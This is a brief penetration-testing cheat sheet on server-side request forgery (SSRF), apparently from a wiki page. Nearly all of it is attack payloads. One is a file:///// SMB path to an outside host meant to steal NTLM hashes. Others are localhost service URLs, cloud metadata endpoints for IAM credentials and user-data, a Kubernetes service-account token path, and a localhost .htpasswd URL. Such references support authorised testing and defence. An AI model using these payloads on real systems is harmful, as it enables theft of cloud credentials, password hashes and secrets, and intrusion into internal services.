SSRF
So many things!
If you've determined you can control server side requests, there are many things to ALWAYS check.
If it's a windows box, you may be able to steal NTLM hashes with file://///10.1.1.1/smb/file.txt. This does require FIVE FORWARD SLASHES sometimes!
Check for any other internal service which may be open on localhost only.
ftp://localhost
http://localhost:8000
http://localhost:8080
Try to find internal secrets or instance metadata!
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
/var/run/secrets/kubernetes.io/serviceaccount/token
Check for any restricted pages which may show additional information to the server
http://localhost/.htpasswd
Last modified 2mo ago
Copy link